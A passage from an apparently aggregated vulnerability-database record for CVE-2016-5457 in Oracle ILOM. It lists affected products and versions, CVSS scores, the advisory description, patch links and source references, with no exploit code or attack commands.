{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003987", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, ], trust: 0.6, }, cve: "CVE-2016-5457", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "nvd@nist.gov", availabilityImpact: "COMPLETE", baseScore: 9, confidentialityImpact: "COMPLETE", exploitabilityScore: 8, id: "CVE-2016-5457", impactScore: 10, integrityImpact: "COMPLETE", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:L/Au:S/C:C/I:C/A:C", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "VULHUB", availabilityImpact: "COMPLETE", baseScore: 9, confidentialityImpact: "COMPLETE", exploitabilityScore: 8, id: "VHN-94276", impactScore: 10, integrityImpact: "COMPLETE", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:S/C:C/I:C/A:C", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 8.8, baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 2.8, id: "CVE-2016-5457", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5457", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5457", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-821", trust: 0.6, value: "CRITICAL", }, { author: "VULHUB", id: "VHN-94276", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-5457", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { 
db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to LUMAIN. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications 
Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. 
\nThe vulnerability can be exploited over the 'Multiple' protocol. The 'LUMAIN' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5457", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5457", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91995", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003987", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-821", trust: 0.7, }, { db: "VULHUB", id: "VHN-94276", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5457", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, id: "VAR-201607-0665", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94276", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:06:45.479000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch 
Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63181", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5457", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5457", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91995", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5457", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5457", }, { trust: 0.3, url: 
"http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94276", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5457", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91995", }, { date: "2016-07-28T00:00:00", db: "JVNDB", id: 